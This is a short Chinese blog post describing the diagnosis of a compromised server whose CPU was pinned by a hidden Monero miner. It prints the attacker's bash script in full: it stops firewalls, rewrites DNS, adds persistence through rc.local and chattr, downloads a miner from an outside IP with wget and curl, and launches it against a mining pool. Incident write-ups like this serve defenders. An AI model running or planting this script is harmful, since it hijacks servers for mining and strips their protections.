技术博客
首页 所有文章 标签 分类 关于
技术博客

目录

记一次服务器被攻击处理

 收录于 Web Server
   约 568 字   预计阅读 2 分钟 
https://bing.ee123.net/img/rand?artid=72357954
目录

记一次服务器被攻击处理

基本情况:服务器没有表象的被攻击征兆,只是偶然登录阿里云控制台,发现主机cpu一个月来占用率都是100%;

于是ssh上服务器执行命令

top -c //看看哪些占用cpu比较高

发现有两个mysql用户的进程各占用47%左右,这两个几乎就占用了全部的cpu。想着服务器上的数据库已经迁移到了阿里云,所以就kill掉他们,然后又查看cpu占用,发现依然有两个这样的进行,只是pid改变了,于是我关闭了mysqld,情况发生了改变。

https://img-blog.csdn.net/20170517105002354?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvbWVkaXZocQ==/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast

果真是被入侵了,我看下有哪些mysql进程。

https://img-blog.csdn.net/20170517105028704?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvbWVkaXZocQ==/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast

其中有一个/bin/bash ./db_temp/haha和./xiao xxx的进程我觉得很可疑

我全局查找haha 发现是个恶意脚本,就赶紧改掉文件名杀掉进程,后又杀掉所有./xiao进程

cpu恢复正常。

目测是shell漏洞引发的,还有待确认。

下面是注入的程序内容:

#!/bin/bash
chmod 777 xiao
chattr 777 haha
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop
echo 'nameserver 8.8.8.8'> /etc/resolv.conf
grep "nohup ./haha >/dev/null 2>&1 &" /etc/rc.d/rc.local >/dev/null
if [ $? -eq 0 ]; then
chmod 777 xiao
sleep 1
chattr +i haha
else
echo "nohup ./haha >/dev/null 2>&1 &" >> /etc/rc.d/rc.local
chmod +x /etc/rc.d/rc.local
chmod +x haha
chmod 777 xiao
chattr +i haha
fi
while true
do
    ps aux | grep xiao | grep -v grep
    if [ $? -eq 0 ];then
         sleep 10
         chmod 777 xiao
         chattr +i xiao
            nohup rm -rf index.html >/dev/null 2>&1 &
         rm -rf nohup.out
    else
        if [ -f xiao ];then
        chmod 777 xiao
        chattr +i xiao
         nohup ./xiao -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 48pYmKDVHLGRtUsM9owu4B6rH5jcxZ4pARyNE6kb4CpB77aZ6EQQwGzfMBmCphMMzgYnYJqZJpLXXWw5m8UgPdpLTsjBUno -p x >/dev/null 2>&1 &
        else
 wget http://120.27.240.44:8080/xiao ; chmod a+x xiao;chattr +i xiao;nohup ./xiao -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 48pYmKDVHLGRtUsM9owu4B6rH5jcxZ4pARyNE6kb4CpB77aZ6EQQwGzfMBmCphMMzgYnYJqZJpLXXWw5m8UgPdpLTsjBUno -p x >/dev/null 2>&1 &
            if [ -f xiao ];then
        chmod 777 xiao
        chattr +i xiao
         nohup ./xiao -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 48pYmKDVHLGRtUsM9owu4B6rH5jcxZ4pARyNE6kb4CpB77aZ6EQQwGzfMBmCphMMzgYnYJqZJpLXXWw5m8UgPdpLTsjBUno -p x >/dev/null 2>&1 &
        else
             curl -O http://120.27.240.44:8080/xiao ; chmod a+x xiao;chattr +i xiao;nohup ./xiao -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 48pYmKDVHLGRtUsM9owu4B6rH5jcxZ4pARyNE6kb4CpB77aZ6EQQwGzfMBmCphMMzgYnYJqZJpLXXWw5m8UgPdpLTsjBUno -p x >/dev/null 2>&1 &
         rm -rf nohup.out
fi
   fi
       fi
done
更新于 2024-12-18
 病毒服务器
返回 | 主页